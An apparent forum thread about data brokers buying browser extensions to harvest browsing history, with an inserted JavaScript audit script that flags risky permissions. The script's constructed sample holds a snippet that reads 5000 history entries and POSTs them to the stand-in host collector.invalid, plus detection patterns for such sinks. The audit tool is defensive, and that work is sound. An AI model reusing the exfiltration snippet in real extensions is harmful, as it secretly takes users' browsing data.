Many popular browser extensions were bought up by data brokers that use them to exfiltrate browser history, so not sure if they’re underrated, I think you have to be pretty careful as the extension security/privacy model is/was pretty awful. I e.g. know screenshotting extensions (Awesome Screenshot) that would vacuum up your browser history and send it to a data broker in Israel. So probably better to have that as a native browser feature.
> Many popular browser extensions were bought up by data brokers that use them to exfiltrate browser history, so not sure if they’re underrated
I would say, as the developer of an upfront paid web browser extension, that upfront paid web browser extensions are underrated. ;-)
It's a truism that if you're not the customer, you're the product. But what if you are the customer? I think a lot of the mistrust of browser extensions is due to the difficulty in monetizing extensions directly. If you're making nothing from an extension, and someone offers you a nice check to acquire the extension, it can be difficult to turn down that money, especially if the extension is a support burden for the developer. Of course I have my price too, as almost everyone does, but at this point the price would have to be 7 figures (maybe 8??), which I don't think anyone would ever pay for my extension. My user base is relatively small, and thus doesn't provide a huge opportunity for data collection or other nefarious schemes, precisely because the extension is paid rather than free.
Sidenote: The "collaboration" offers come from time to time even to non-extension projects, if they are reasonably widely used. E.g. simple tools (a rather widely used suite of Android apps recently sold).
This is fantastic. Too bad they redacted the names. These scumbags deserve to be known. And the saddest part of the story is you don't know if it is true or a cover-up. On the other hand it appears to be MIT. Are Google Chrome extensions reproducible?
Yup, and he won't care about the criminal investigation because he's on the other side of iron curtain v2. But if you're from the side where the nation isn't the cover for criminal enterprise you could get in trouble.
The only difference between a paid and unpaid piece of software is the revenue stream. With paid software, your incentive to not screw over existing users is that your app would get poorer ratings and you won't acquire new paying customers. I've seen many times where a paid app stops growing as much and turns into a subscription model or becomes unpaid, giving paid users some small benefit (or nothing at all) and starts screwing over all users indiscriminately.
Something that’d help here is if extension galleries displayed price tags and let you filter by paid (bonus points for being able to distinguish between one-time and subscription).
Upfront payment does not exclude further monetization at the expense of the user. If anything, it is a signal that the developer is motivated by money.
> If anything, it is a signal that the developer is motivated by money.
Duh?
Who isn't motivated by money, though? The frequent acquisition of free extensions proves that even open source developers are motivated by money too.
The issue, again, is the identity of the customer. Is the customer you, the extension user, or is the customer the advertisers, making you the product?
Yes. Because of this and the lack of fine-grained permissions mentioned by a sibling comment, I tend to use desktop apps where I can instead of extensions, keeping my extensions list quite slim — basically all I install are FOSS extensions by “big” known-good authors (e.g. Raymond Hill) or projects that aren’t going to sell out.
Of course risks exist with desktop apps too, but historically this kind of buy-and-exfiltrate scheme is comparatively rare with desktop apps, particularly on macOS where signed apps are sandboxed and can’t do a whole lot without user permissions.
> I tend to use desktop apps where I can instead of extensions
How locked down are desktop apps now on Mac, Windows and Linux? I haven't kept up. Do they still have a lot of access by default to do malicious things with? I recently saw someone install the Adobe Acrobat desktop app and it installed its own extension inside of Chrome without asking. Games can have scary DRM as well.
Chrome extensions can't read/write to arbitrary places on your hard disk without asking, for example, and you can isolate them within separate profiles. Not saying they're perfect but there is robust sandboxing of what they're allowed to do. I'm curious how this compares to an Electron-based desktop app, i.e. one that is running Chrome on the inside but with the standard restrictions Chrome places on tabs and extensions unlocked.
> How locked down are desktop apps now on Mac, Windows and Linux?
It’s hit or miss. There have been advancements on macOS and Linux where there are mobile-style permissions and sandboxing in some cases, but one needs to be aware of how apps are packaged to be able to leverage these advancements. Adobe stuff and Chrome on macOS for example have basically free rein still as they have specifically opted out of OS sandboxing, while a lot of small indie apps are sandboxed. Chrome I think can be put in a sandbox on Linux by way of Flatpak.
Windows has done practically nothing and is the same as it’s always been where desktop apps can do basically whatever they please, especially if given privileges with UAC (which seemingly every other Windows app needs for some reason).
Windows introduced better mobile-style permissions and sandboxing with the APPX format in Windows 8. However the only incentives to use it were the ability to build UWP apps and access the Windows Store. Everyone rejected the Windows Store, so developer adoption is close to zero (and now those incentives are gone too).
The bar to write secure desktop software is significantly higher than for browser extensions. Especially with all the Electron crap these days, you're one XSS away from full-blown RCE.
Absolutely, but the short- and long-term risk posed to most by installing random browser extensions willy-nilly is still almost certainly higher than that of instead opting for vetted desktop apps, especially if using PWAs in place of Electron apps where possible (which I do).
I’m talking about community vetting. It’s usually easier to find discussions on the internet where people have discussed and scrutinized desktop apps (e.g. “this app phones home”) than it is to find the same for most browser extensions (which are often only heard about after having been turned into malware).
The tooling is often better there too, e.g. one can keep a short leash on app network activity with Little Snitch and similar but I’m not aware of an equivalent for browser extensions.
It's not the lack of a fine grained permissions model, it's the total lack of a real threat model and any consideration at all for what happens as extensions change over time.
>probably better to have that as a native browser feature
/Agree. It is crazy that I have to trust some unknown coder with all my browser data just to enable vertical tabs in Firefox.
Of course many of these extensions are open source and thus auditable. As I lack the skill to detect nefarious code, I am wondering if this might be a good use case for AI. Anyone have thoughts on building good malware-finding prompts?
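Before handing an extension's source to an AI reviewer, a mechanical first pass catches the pattern the thread opened with (a screenshot tool that reads browsing history and ships it off-site). The script below is an added example, not code from the thread or from any extension mentioned in it: it audits an unpacked extension's manifest for permissions that expose browsing activity, then looks in each source file for a browsing-data API used alongside an outbound network sink, and lists the hostnames it finds in URL literals. The sample manifest, the source snippets and the `collector.invalid` hostname are constructed for illustration.

```javascript
// Added example (not from the thread): static pre-install audit of an unpacked
// Chrome/Firefox extension. Flags manifest permissions that expose browsing
// activity, and source files that pair a browsing-data API with a network sink.

// Permissions that give an extension broad visibility into browsing activity.
const SENSITIVE_PERMISSIONS = new Map([
  ["history", "read the full browsing history"],
  ["tabs", "read URL and title of every open tab"],
  ["webRequest", "observe every network request"],
  ["webNavigation", "observe every navigation event"],
  ["cookies", "read cookies for permitted hosts"],
  ["<all_urls>", "inject content scripts into every site"],
]);

// Host patterns that effectively mean "every site".
const WILDCARD_HOSTS = ["*://*/*", "http://*/*", "https://*/*"];

// Ways an extension can move data off the machine (no 'g' flag: .test() must be stateless).
const NETWORK_SINKS = [/\bfetch\s*\(/, /\bXMLHttpRequest\b/, /navigator\.sendBeacon\s*\(/, /\bWebSocket\s*\(/];

// APIs that expose browsing activity.
const HISTORY_SOURCES = [/\b(?:chrome|browser)\.history\.\w+/, /\b(?:chrome|browser)\.tabs\.query\s*\(/];

function auditManifest(manifest) {
  const findings = [];
  const declared = [
    ...(manifest.permissions || []),
    ...(manifest.optional_permissions || []),
    ...(manifest.host_permissions || []),
  ];
  for (const perm of declared) {
    if (SENSITIVE_PERMISSIONS.has(perm)) {
      findings.push({ kind: "permission", value: perm, why: SENSITIVE_PERMISSIONS.get(perm) });
    } else if (WILDCARD_HOSTS.includes(perm)) {
      findings.push({ kind: "permission", value: perm, why: "matches every site" });
    }
  }
  return findings;
}

// Hostnames of absolute http(s) URL literals in a source file.
function externalHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/["'`](https?:\/\/[^"'`\s]+)["'`]/g)) {
    try { hosts.add(new URL(m[1]).hostname); } catch { /* not a parseable URL */ }
  }
  return [...hosts];
}

function auditSource(file, source) {
  const readsHistory = HISTORY_SOURCES.some((re) => re.test(source));
  const sinks = NETWORK_SINKS.filter((re) => re.test(source)).map((re) => re.source);
  if (!readsHistory) return [];
  const hosts = externalHosts(source);
  if (sinks.length) {
    // The combination that matters: browsing data read in the same file as a way to send it out.
    return [{ kind: "exfil-pattern", file, why: `reads browsing data and uses ${sinks.join(", ")}`, hosts }];
  }
  return [{ kind: "history-read", file, why: "reads browsing data", hosts }];
}

// Combined report: a pattern finding weighs more than a single permission.
function auditExtension(ext) {
  const findings = auditManifest(ext.manifest);
  for (const [file, source] of Object.entries(ext.sources)) findings.push(...auditSource(file, source));
  const score = findings.reduce((s, f) => s + (f.kind === "exfil-pattern" ? 3 : 1), 0);
  return { findings, score, verdict: score >= 3 ? "manual review before install" : "low signal" };
}

// Constructed sample extension (hypothetical; collector.invalid is a reserved placeholder name).
const SAMPLE_EXTENSION = {
  manifest: {
    manifest_version: 3,
    name: "Example Screenshot Helper (constructed sample)",
    permissions: ["activeTab", "history", "storage"],
    host_permissions: ["<all_urls>"],
  },
  sources: {
    "background.js": `
      chrome.history.search({ text: "", maxResults: 5000 }, (items) => {
        fetch("https://collector.invalid/upload", { method: "POST", body: JSON.stringify(items) });
      });
    `,
    "popup.js": `document.getElementById("snap").onclick = () => chrome.tabs.captureVisibleTab();`,
  },
};

const REPORT = auditExtension(SAMPLE_EXTENSION);
console.log(JSON.stringify(REPORT, null, 2));
```

On the sample this reports two permission findings (`history`, `<all_urls>`) and one exfil-pattern finding in `background.js` naming `collector.invalid`, for a score of 5 and a "manual review" verdict; `popup.js`, which only captures the visible tab, produces nothing. A real audit would also unpack the published CRX rather than trusting a repository, since the thread's point is that the shipped build can diverge from the open-source one after an acquisition.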
This is a really great idea and use case. It also makes a ton of sense as a pilot use case for this type of open source project given extensions are smaller in scope.
I mean even having it document a best draft of what the extension code is doing would be awesome.
Unless it’s made into an extension and then you have a recursive hell.